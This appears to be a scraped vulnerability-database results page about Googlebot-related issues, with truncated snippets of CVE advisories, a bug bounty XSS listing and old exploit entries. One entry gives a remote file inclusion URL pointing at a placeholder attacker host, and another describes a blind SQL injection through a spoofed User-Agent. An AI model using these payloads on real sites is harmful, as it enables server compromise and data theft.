EUVD-2023-42295

Malicious code in bioql PyPI...

CVE-2023-38479

Missing Authorization vulnerability in codents Simple Googlebot Visit simple-googlebot-visit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Googlebot Visit: from n/a through = 1.2.4...

CVE-2023-38479

Missing Authorization vulnerability in Codents Simple Googlebot Visit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Googlebot Visit: from n/a through 1.2.4...

CVE-2023-38479 WordPress Simple Googlebot Visit plugin <= 1.2.4 - Broken Access Control vulnerability

Missing Authorization vulnerability in Codents Simple Googlebot Visit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Googlebot Visit: from n/a through 1.2.4...

CVE-2023-38479

CVE-2023-38479 affects WordPress Simple Googlebot Visit plugin (

WordPress Simple Googlebot Visit Plugin <= 1.2.4 is vulnerable to Broken Access Control

Software Simple Googlebot Visit Type Plugin Vulnerable versions = 1.2.4 Fixed in 1.2.5 OWASP Top 10 A5: Broken Access Control Classification Broken Access Control CVE CVE-2023-38479 Patch priority Low CVSS severity Low 5.3 Developer Claim ownership PSID ecc096b71d07 Credits Abdi Pranata Required...

Yelp: Robots.txt file with potentially sensitive content.

Vulnerability description not provided...

Shocking: Hackers using Googlebots in cryptomining malware attacks

By Waqas Hackers are abusing Googlebot servers to deliver malicious payloads. Last year, HackRead exclusively reported on how hackers were using Google Adwords and Google Sites to spread malware. Then came another shocking research from Cisco Talos exposing how hackers exploited Google Search...

api-jobsearch.livecareer.com XSS vulnerability

Open Bug Bounty ID: OBB-385767 Description| Value ---|--- Affected Website:| api-jobsearch.livecareer.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

Web Crawler Access Detection - Googlebot

Binary data 9181.prm...

DreamAccount <= 3.1 (auth.api.php) Remote File Include Exploit

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class TestPOCPOCBase: vulID = '63672' ssvid version = '1.0' author = '皮皮' vulDate = '2006-12-01' createDate = '2015-12-24...

SAPID Shop <= 1.2 (root_path) Remote File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '63795' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-09' createDate = '2015-12-24...

Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '64022' ssvid version = '1.0' author = '皮皮' vulDate = '2006-09-28' createDate = '2015-12-24...

mambo com_babackup Component <= 1.1 File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '63864' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-22' createDate = '2015-12-24...

RedBlog 0.5 Index.PHP Remote File Include Vulnerability

RedBlog 0.5 Index.PHP 远程文件包含漏洞 漏洞类型： 输入验证错误 漏洞危害： 攻击者可以利用该漏洞执行远程php文件，从而攻击RedBlog甚至控制 服务器 exp： http://www.example.com/Path/index.php?rootpath==http://evilscripts? 解决方案： 厂商没有提供补丁，推荐使用加速乐: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from...

Cmseasy某处SQL盲注漏洞（绕过360防护）

简要描述： 注入..但是木回显 盲注了.. 详细说明： index.php 84行 stats::getbot; 由于初始化的时候也没对$SERVER做过滤的什么措施 导致的注入 stats.php 13行到78行 getbot 这个功能是看蜘蛛的记录 $SERVER 没过滤 我们只需要把HTTPUSERAGENT伪造成蜘蛛的就ok了 public static function getbot $ServerName = $SERVER"SERVERNAME"; $ServerPort = $SERVER"SERVERPORT"; $ScriptName =...

URL Spoofing vulnerability in GoogleBot, Yahoo! Slurp, Mozilla and Internet Explorer

Hello 3APA3A! I want to warn you about URL Spoofing vulnerability in GoogleBot, Yahoo! Slurp, Mozilla and Internet Explorer. If vulnerabilities in browsers I found often, than it's first time when I found vulnerability in search engine's bot spider. Bots of other search engines also can be...

Joomla! Component d3000 1.0.0 - SQL Injection

Powered by Download 3000 AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 BLOG : http://my.opera.com/SQL-Injection/blog/ MAiL : [email protected] DORK 1 : "Powered by Download 3000" DORK 2 : allinurl: "comd3000" EXPLOiT :...

si2007-sql.txt

Homepage: http://devilteam.eu/ 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa...

Xpression News 1.0.1 - archives.php Remote File Disclosure

Xpression News 1.0.1 - archives.php Remote File Disclosure r0ut3r Presents... Another r0ut3r discovery! writ3r at gmail.com XNews Remote File Disclosure Exploit Software: Xnews 1.0.1 Vendor: http://xpression.hogsmeade-village.com/ Released: 2007/01/28 Discovered & Exploit By: r0ut3r writ3r at...